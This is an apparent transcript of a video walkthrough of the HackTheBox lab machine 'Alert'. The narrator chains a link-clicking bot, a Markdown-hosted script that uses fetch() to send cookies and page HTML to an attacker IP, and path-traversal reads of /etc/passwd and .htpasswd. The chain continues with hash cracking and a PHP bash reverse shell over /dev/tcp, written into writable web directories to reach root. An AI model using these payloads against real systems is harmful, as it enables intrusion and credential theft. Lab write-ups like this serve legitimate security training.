What's going on YouTube? This is IPSEC, and we'll be doing Alert from HackTheBox, which the foothold is probably a tad difficult for an easy machine as it requires enumerating a web app via cross-site request forgery. However, every critical piece of information needed to do this can be found multiple ways, and I'll do my best to highlight them as we go through it. First, we discover there's a Contact Us page, and when we submit a link to it, a web browser immediately opens it up. There's also a Markdown converter that we can use to have the web server host some JavaScript. So we can submit the page the Markdown converter gives us to the Contact Us form and then control the target browser. And when we point that browser at the homepage, we discover there's another page called Messages, and that has a file disclosure vulnerability that we can use to leak the HTPASSWD file that lets us on the box. And from that user, the box is pretty easy. We discover there's another web server running that we can just drop a PHP script and execute it to get root. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it alert, then the IP address of 10.10.11.44. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80, and its banner tells us it's Apache, also running on Ubuntu, and also it is redirecting us over to alert.htb when we access it. So let's go ahead and add this to our host file. So we'll do sudo v etc host, not passwd. There we go. And then we'll do 10.10.11.44, put alert.htb, save that. And then let's go take a look at the website. So we'll do http alert.htb, and we can see it starts off with a Markdown viewer. Now, when we click browse, it wants us to attach the file. So I'm just going to do vtest.md, and then we'll put some basic Markdown. Okay, we can save that. And now let's go ahead and find this file. So it's in the HTTP alert directory and test.md. I'm also going to intercept this request just so we have it in responder. Intercept is on. Okay. Let's view the Markdown. Send it over to repeater. We can forward that. And we just get a page. If we look at the repeater for what happened, we can see the Markdown viewer, and it converts the Markdown over to HTML, right? We have the header because we did the header tag, I guess, or the emphasis. I don't know exactly what the Markdown names for those are, but it did a relatively good job. We can see it redirects us over to visualizer.php and then gives us a Markdown file. So my first thought is, can we have any type of file inclusion vulnerability here, right? So let's go ahead and also put this into Burp Suite. Send that to a repeater, and we hit enter on this. We can see the page. So let's change this link share. It's probably going to an uploads directory. So I'm going to put ../, and then we'll try index.php to see what happens. And we get invalid file name. So wonder if we did ../index.md. Does that work? No, it doesn't. So it doesn't like the ../ probably. So if we did index.php here, what happens? Invalid file name. What if it was index.md? Invalid file. Is that what it did before? We did ../? No. So there is some type of filter here that doesn't like ../. Or if it doesn't like the slash. Let's put a slash in line with this. Invalid file name. So it's probably just allowing us to do period and then characters and numbers, I'm guessing, in this. So there's some type of filter on link share. So I'm not really that concerned with a file inclusion vulnerability there right now. Maybe if we figured out what the directory was, we could try other things, but it has to end in .md, I think. So it's pretty hard to find a vulnerability there unless, let's see, this is some type of predictable format like the date, but this looks just like two random strings because we could potentially go back and look at other things people are putting down on the Markdown and access it kind of like an IDOR vulnerability, right? But None of that looks like it exists. Let's just move on and look at other things of the website. So I'm going to turn Burp Suite off, and then we can go to alert.htb again. We go over to the contact us page. It wants email and a message. Let's just test if this works. Root at ipsec.rocks. Man, my message is lagging as I type into this box. That's weird. Image source is equal to HTTP 10.10.14.8. Let's put it on port 8000. And we probably need to do like test.png, right? And then let's do /image like that. And I will also put this one over to Burp Suite. Okay, is my intercept on? Now, let's click send. And let's see, that can be forwarded. This is the first request, and we should start labeling these. This will be generate MD. This is link share, and this will be contact us. Awesome. Before we send that request, let's just listen on port 8000. We can send it, see what the message says. It just directs us saying the message was sent successfully. And then looking at this, we actually see a connection immediately. So we see connection from 10.10.11.44, and it is getting the image from us. And we got some weird HTML here. Let's see. Do we actually need to URL encode this? Probably not. And I'm actually going to add a K to my LVNP just so it keeps this connection open, so you don't have to keep testing that. So we'll send that off. While that goes, let's just take a look at the donate page. Let's forward this, turn intercept off. Looks like we have to enter a amount to donate, and then we click it, and nothing really happens. We can intercept this real quick. Donate for the request, amount 12, 1345 bytes. Let's put a single quote, 1345 bytes. Put nothing, 1345. So everything's just doing the same thing. I'm guessing the donate, even if it was vulnerable, it's going to be hard for us to figure something out. I'm going to focus more on this cross-site scripting right now because that's the biggest lead we have. And it is still sending this back. What if I put a space here? Okay. So for some reason, it's adding all of this into the link. I don't understand that right now, but let's just see if we can steal cookies. So I'm going to do image source is equal to X, and then we can say on error is equal to, and I'm going to do fetch HTTP 10.10.14.8 port 8000, and then we can say plus, and we have to URL encode that. We'll do B2A document.cookie like that, close out the fetch and that, send it. And let's see. It did not process this at all. We get the quote, do a space. Try this again. Huh. I wonder if it doesn't like the plus. Let's do a double URL encode just in case it's like URL decoding and then that. Still doesn't really look any different. Oddly enough, like the request is identical. I don't see any difference between, oh, it just went through. So we see the plus is URL encoded there. So that did not do anything. There is something else in JavaScript we can do. I'm going to go in the console pane to show you. If we do like console.log, I'm going to do test. And then we do plus B2A and then stuff here. And this is going to do what you expect and say test, and then has some base64 encoded things, right? If we use backticks here, actually, we can treat it kind of like a template instead of doing the plus. So I've had some luck with evading filters with this. So if we do this way, we can see it does the same thing. If we had a double quote here, do a double quote, and then we'll put this in single quote. So we could have escaped the double quote, I guess, but see, it still prints it like that. So only the template works with the backticks. So that's why I'm going to try this, just in case maybe the plus is causing the issue. So let's go and change that like this. And then document.cookie. Let's see, how would this go? Like this, like that, and close off the fetch. Awesome. So let's look at the page, and it's just straight like this. So nothing's getting processed here. And then, like, thinking about it, if I left this quote in, or the angle bracket, that's when it gives us a bunch of stuff. So what's happening here is I think they're just clicking on the link. So it doesn't really matter like the HTML we've been doing here. It's just because this has been showing as a hyperlink and getting clicked on. We can validate that by just like sending a link. So let's just have the message be no HTML, and we'll simplify it and just put a link here. And we get a connection back immediately. So this is just clicking a link. And let's go and look at the Markdown, right? Because we can get them to go to a page. If we can get them to go to this page and put some type of cross-site scripting payload on it, we can probably get them to execute it. So I'm going to try script, and then we can do source is equal to HTTP 10.10.11.14.8, which is my IP address. We'll do pwn.js, and then end the script tag, and see what happens here. We see it is looking good. I'm going to copy this link, the share link. I'm going to paste it in my browser. I already have that up. If we look here, do we have a connection yet? Oh, we're probably intercepting on Burp Suite. We can turn that off. So we load this page, and it's making a request to load pwn.js. So this is going very well for us. I'm going to make a directory www, and we're going to create pwn.js. So let's do v pwn.js, and we're going to say fetch http 10.10.14.8, and then we can say we'll do / like that, plus b2a document.cookie, like this, and close everything out. Save that. And then we want to grab this page that we had sent with the generate MD. We can copy this, go to the contact us. We're going to put this page here, send it. And we probably need to stand up the web server. Python 3-m HTTP. Let's do a new pane, www Python 3-m HTTP server. There we go. Send it again. They do a get on pwn.js, so it loaded, but nothing else happened. So we do fetch 10.10.14.8. I did not specify port 8000. There we go. And we don't have any cookie. So HTTP only probably is set. So here I'm going to play with like cross-site request forgery. So let's go edit pwn.js. And I'm going to create 2 helper functions for me just because this makes like cross-site request forgery easier for me. This is probably not the correct way to do it. It's just how I do it. I'm going to create a async function for get data. And then I'm going to say the response is equal to await fetch on URL. And then we can say the result is await response.text. And then we can return result. Okay. And I also want to do async function for post data. And we'll do URL data. And this one is a little bit more complex. We'll do const response is equal to await fetch URL. And then we got to send the extra parameters. So we're going to say the method is going to be a post. And then we want to say mode is equal to no cores. If we don't do that, then first it's going to send like the option verb and see what methods the web server supports. The mode no cores is just going to make it do a post request right away. So we'll do headers, and then we need to set the content type. And that's what application x www form URL encoded. That's normally what's on a post request. And now we can finally send over the body, which is just going to be the data parameter we send it. We close this out. And then we do const result is equal to await response.text return result. Okay. And then async function pwn is going to be the chain I'm doing. So I'm going to say const page is equal to await get data. And then we can just say http alert.htb. And we're going to get what page the browser sees. And then we do await post data. We're going to send it back over to us. So http 10.10.14.8. And I'm not going to do port 8000 because that's where my Python HTTP server is. I'm going to just send it over to a netcat that I'll have listening on 9001. And then we give it the page like this. Close that out and then run pwn. So all this is doing is having their browser query alert.htb and then send it back over to us. I'm going to just put a slash here. I don't think I need it, but just good habit. Okay, so now our pwn.js is there. Let's do Python 3 HTTP server. Address already in use. Okay, that's fine. Let's just do a nclv nkp 9001. And let's see, if we send this request again, we got pwn.js and nothing. So it hit the thing, but we didn't get anything. So let's test this out on ourselves because we probably have a typo or something. If we send it to ourselves, we have the debugging. So response is not defined in pwn.js line 3. Pwn go 3 because I have a typo there. Refresh. Awesome. So we see 10.10.14.8 got pwn.js, and then we have data here. This is the HTML of alert.htb, right? So let's go ahead and send it again. So we're sending the contact us. They should hit the, oh, they did, I think. We see a new link here. Before we go up, it went Markdown viewer, contact us, about us, donate. And now this goes with messages. So we have a new page here. And as I'm looking at these links, I probably should have tried another file inclusion technique, right? Because this page is often also like a file inclusion vulnerability. If we just build it manually, it's doing something like this. What is it? Index.php page is equal to. And then it does like donate, right? And that loads the donate page. So my first thought is maybe it's doing donate.php. So if we try this, is this going to be a file? It is not. Maybe there's another directory, pages. So we probably should start up some type of dirbuster on this to figure out exactly how the page is working, right? Because most of the time it'll do index.php and then page, and it's taking this variable, it appends.php and doesn't include, right? So maybe we could do like /index and load something. And we get page not found. So that's not happening. But that is something else I would think about. It just didn't dawn on to me until I saw the link. But now that we have the cross-site scripting thing, let's go focus on this. So we have this index.php page is equal to messages. And as I say that, let's just see one last thing. I'm sorry for jumping all over. But if we had set up like wfuff, what happens if we do page is equal to messages here? We don't get a does not exist. Messages A, page not found, messages, nothing. So if you had set up a fuff, so normally when doing like a test, I would copy this to a file. Let's go with HTTP alert. We'll say this is page.request. Okay, that's saved. Let's do this real quick. Fuff dash request page.request request proto. Is it equals to spaces? I think space is fine. Word list, let's do op sec list discovery web content raft small words dot text. And let's see, something did not like it. Get that. Oh, v page.request. Let's change messages over to fuzz. There we go. Awesome. Let's now filter out, let's say, filter size 690. We get about, let's see if we get anything else, messages. So that's how you could also find page is equal to messages. So you could either do it from like cross-site request forgery accessing alert.htb, or you could find it through wfuff. Also, actually, we'll get to that in a second. So let's see. We have the cross-site request attack right here. So let's go back and edit pwn.js. And we want to see what the message page looks like. So let's do question mark page is equal, is it just message or messages? Messages, looks like that. Save. And now let's go back here. Contact us, send it. I don't think it worked. So let's just generate again. I think this link is only valid for a certain amount of time. So every now and then, I think you just have to update it. We're just testing this real quick. Or maybe we broke pwn.js when we edited it. Both are possibilities. We got the second pwn.js, and it's directing us to messages.php. And this is another place where we could have got a hint, right? If we had done a dirbust on files, we'd find this messages.php, I believe. We do a request here. We're getting no page. So if we ran like gobuster u http alert.htb word list opt seclist discovery web content graph small words dot text arguments as PHP, we to set this in dir mode. Let's see if we end up getting like messages.php. There is a uploads directory that I haven't saw yet. If we just go alert.htb uploads, we get forbidden, but that's going to be where all the markdown files are. And we can see there is a messages directory and messages.php as well. So again, you could find all this information out multiple ways. We're finding out through like the cross-site request forgery, but if you have a good recon thing running all your tools, like doing fuzzing when you see things, it's also apparent there. And I'd always recommend doing that fuzzing in the background because it does take time to run and you just really can't get the time back. And sometimes seeing those things gives you the hint you need in order to move forward, right? So let's see. Let's go back to our pwn.js. So we can go here, and what it's doing is saying it's doing messages.php and then file is equal to something. So I'm going to try for file disclosure. So let's try, let's see. Let's go edit this. Paste. And we'll do a bunch of dot slashes. HTPASSWD. That sounds good. Go back here. Let's send the contact us form again. And we get PASSWD. Now, what I'm thinking is, do I have a LFI vulnerability, an inclusion vulnerability, or just disclosure, right? I'm probably in the uploads directory, the messages directory. So my first thought is let's go up one directory and include index.php. If If I see a bunch of PHP source code, then it's a file disclosure vulnerability because it's not including it. If I actually get what index.php looks like without any PHP code, then we know we can execute things. And then I'd probably try to put like PHP code on a Markdown file and then go to it and execute code that way. But we're seeing the PHP tag, so we can't execute anything. But we can see what index.php looks like. And it looks like it's just a switch statement. And oddly enough, at the top, when it's generating all the links, if it's coming from localhost, it is giving us this message thing. So there is no like cookie to steal. So HTTP only wasn't set, but that's only because there is no cookie to begin with. I think that means also we could probably skip the whole Markdown thing and just run JavaScript on our own page and then request it on this, which I'm going to test at the very end of this video because I haven't done that yet. It's just something I'm thinking about as I'm looking at this code. Let's see. Is there anything else interesting here? We could look at what messages.php looks like, I guess. So let's go and edit our thing. And let's do messages.php, save that. Go over here, send the contact. And let's see. We have file get contents. Nothing of interest to us. The other thing we had was this whole link share thing. Let's see how this is doing it because maybe there's an include statement there. So I'm going to look at the source code for visualizer.php. So we can paste this, get rid of that extra PHP. Check this out. Does not look like I got anything. Send it again. Oh, we're on the link share. Let's go to contact us. There we go. Okay, this is the Markdown source code. And see how it's working. So Markdown does go into uploads. There's link share. Show Markdown is the function. So we don't have any sanitization right here. It's just the straight get of the file. So let's look at show Markdown. And there we have it. So we have a regular expression making sure it's alphanumeric and adds a period and also ends in .md. And looking at it, it's going to execute parsedown.php. So we could pull this file as well, look, see if there's any vulnerabilities here. Maybe there's a RCE in this PHP, but I'm not going to do that. I'm pretty confident there isn't, but if you want to do something to take a look at, you could probably Google like PHP, GitHub parsedown.php and get the version or something like that. Main thing is I'm looking at it. We see a file get contents, not a include statement. So no LFI there. So at this point, let's try changing up our payload and let's get Etsy host. So let's do .. And I always like getting Etsy host because it's a good indication if I'm in like a Docker or something like that. It's just always a good file to look at on Linux. And we get a extra domain, statistics.alert.htb. We hadn't seen that yet. But again, if we had been due diligent and did all a recon, let's try a virtual host enumeration. So we can do fof-u http alert.htb, wordlist, ops, seclist, discovery, DNS, subdomains, top, let's do 5,000. And let's see, the host header is going to be host, fuzz, alert, HTTP. Let's filter code 301 and see if we get statistics. Chances are we will, I believe. Yep, there we have it. So another way we can know statistics.alert.htb exists. So if we added this to our host file, so sudo v etsy host, let's do statistics, statistics. I'm mistyping that. Do I have it in my clipboard? Please say I do. Awesome. And let's go and browse to that page. It asks for a username and password. Now, normally when Apache does this, it's going to be a .HTPASSWD file, and you can't just request that file. So that had no response there, but forbidden, right? But we do have a file inclusion vulnerability, right? So we could go where we think this file exists. So normally it's var dub, and then it's either going to be probably statistics. Man, I cannot spell statistics today. Let's just put that. It's either going to be the fully qualified name or just statistics, right? So we can just try the fully qualified alert.htb like that, and then .htpasswd, and see if we can get this file, because this is most likely where it's going to be. Send that. And we do. We grab the HTPasswd file right there. Now, we could have also found it another way. So if we wanted to, we could potentially like enumerate the Apache config. So Apache config is going to be etc Apache 2 sites enabled. And then what is the default for Ubuntu? It's going to be the same as my host. I have it installed, sites enabled 000-default.conf. And you can play with a bunch of file names, right? But we're going to try the default Apache. Send that. I don't think it worked. Let's see. Did not screw up the HTML. Let's just go and generate MD again. I'm going to put /body in my search, and then we just auto scroll to this. So this just makes it a bit easier to get a new link whenever it expires. Paste it. And there we go. We have the Apache config. And we can see right here, all the virtual hosts are being set, statistics, and also specifying the auth user file. So again, multiple ways we can get this HTPassWD. I'm sure there's probably more than I'm showing here. These are just kind of the ways I would go about it, right? So let's go here. We can paste it. That's not the right clipboard. That looks like better. Let's just grab this again so we can go over and try cracking it, right? So copy this. And then I'm going to go over to the Kraken, just another box out of my network. For you, just run it on your host. I would not try cracking in a VM. We can do hashes, alert.hdb, put in this hash, /hashcat, -- user, because we have the username : the hash. The file name, opt word list rocku.txt. It should start in auto detect mode, and hopefully it auto detects it. Looks like it does. And we have already cracked it. The password is Manchester United. Additionally, because we did the -- user, if you get rid of the word list, you can do -- show, and it'll look in your pot file and show the hash : the password. That's why I always like using the -- user. So now we can log into this statistics page if we wanted to. So we can do Albert and the password, and we see donations. If we went to the very beginning of this box with this whole donate thing, it did nothing. Let's see if it does anything. So probably month January of 2024. Well, December 2024. I don't think any of these numbers are going to change. Let's put a 1,000. Donate. Refresh. And no numbers changed. We could try SSHing into the box. So I know we did etc/passwd a few times. I'm going to search up for root. It's going to find it there. Here's passwd. And looking at all the users, we can see Albert is a user on the box. So let's just go ahead and try SSH Albert at 10.10.11. I think 44 is it. And then the password, do I have Manchester United on my clipboard? I do, and we get logged in. So the first thing I always do is just look at what's in the home directory. We have user.txt there. We could go in var dub and see if there's any databases. If we got like any more hashes we could get, we could look at the messages directory, the uploads directory to see if there's other files we could be reading. It doesn't look like that's the case. We go in statistics. Did we miss anything here? We can't even go in statistics. We don't have permission. oddly enough. But we could go and alert because that 777 statistics is 77 and we're not dub data. If we wanted to escalate to dub data, we may be able to. Let's do find dot dash writable. And we can write any of these files. So we could just go in uploads and then v shell.php. And then let's do PHP system and then --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. I think that's good. Okay, so let's just do a get on uploads shell.php nc lvnp 9001 already listening. Let's kill that. There we go. Now we're dub data. If we wanted to, we can go up to directories. Maybe. I screwed up the shell. This single quote goes there. Not sure what I was thinking there. Send that again. Let's go up to cd statistics dot alert HTTP. There's only index.php. And we could look at this to see anything interesting. Echo JSON encode. Nothing really sticks out. Let's just search up for $_ to see if it ever gets any variables, and it doesn't. So we don't really get anything by switching over to the dub data user, but that is something I generally do play with. The other thing I like doing is a psef --forest, looking at all the processes that are running. We can see our reverse shells. Let's see. We have some cron scripts running. So root scripts XSS bot. This is iNotify_wait, which is kind of, it's an easy way to hook iNotify, which is like file system events. So right there, they're setting like an event. Probably if a file gets created, it automatically executes a script. It's much quicker than doing like a cron every minute, right? It's just monitoring for files being created and things like that. So let's see, what else do we have? DH client. Let's see. Python 3. I don't know what that's doing. Manager. Right here is interesting. We have root running a web server on port 8080. We also have fail to ban being ran, so that's what Python is doing. So it has fail to ban, but let's look at what the website monitor is. So port 8080. And if we had just done an SSLNTP, we would have seen 8080 as well. PSEF grep 8080. Let's see. That's an opt website monitor. And this is running as root. And let's see. I'm just going to do the same thing. Find dot dash writable. We need dash writable. And we can write to monitors and config. So let's go in config v shell.php. And we're going to say the same thing. Can I just copy that? Copy var dub HTML alert. No, not that. Alert uploads shell. Awesome. So let's now try. We can exit this shell. And it was listening on 8080. So let's curl localhost 8080 config shell.php. And there we go. We got a root shell on alert. So we can cat root.txt, and that's it. So hope you guys enjoyed that. Take care, and I'll see you all next time. Actually, wait a second. There was one thing I wanted to test. And that is because the website itself, we went back to it, var dub alert, less index. Is it here? Because it's doing it this way, I think we could probably just trick the browser in hitting this page from our website that we stand up. And that's what I want to try. So let's go back to the contact page. I'm probably going to show this earlier because it's only going to take a second, right? Let's just do message HTTP 10.10.14.8 8000 index.html, and let's create this. So let's go here, v index.html, HTML script source is equal to own.js / script / HTML. Let's see what happens here. That netcat's no longer listening, so we can stand it up again. Send this message. It got pwn index.html, pwn.js, but nothing happened. I wonder if there's going to be some type of browser protection. Let's look at this again. Pwn.js. That is sending to 9001. That's good. I'm going to change this real quick. Let's just do the alert.htb because I'm going to do this from my web browser to see if any error message appears. So save that. Send it again. We get index, we get pwn, but no data back. So let's try it on ours. So HTTP 10.10.14.8 8000 index.html. And I'm also going to have my console window open so I can see any errors. And we have access control origin missing. So because of cores, we can't just access the other page easily. We may be able to like add cores header, but I don't think so. So that's why this isn't so easy. You have to like put it on the Markdown page itself. And that's probably going to be the video. So take care, and I will see you all next time.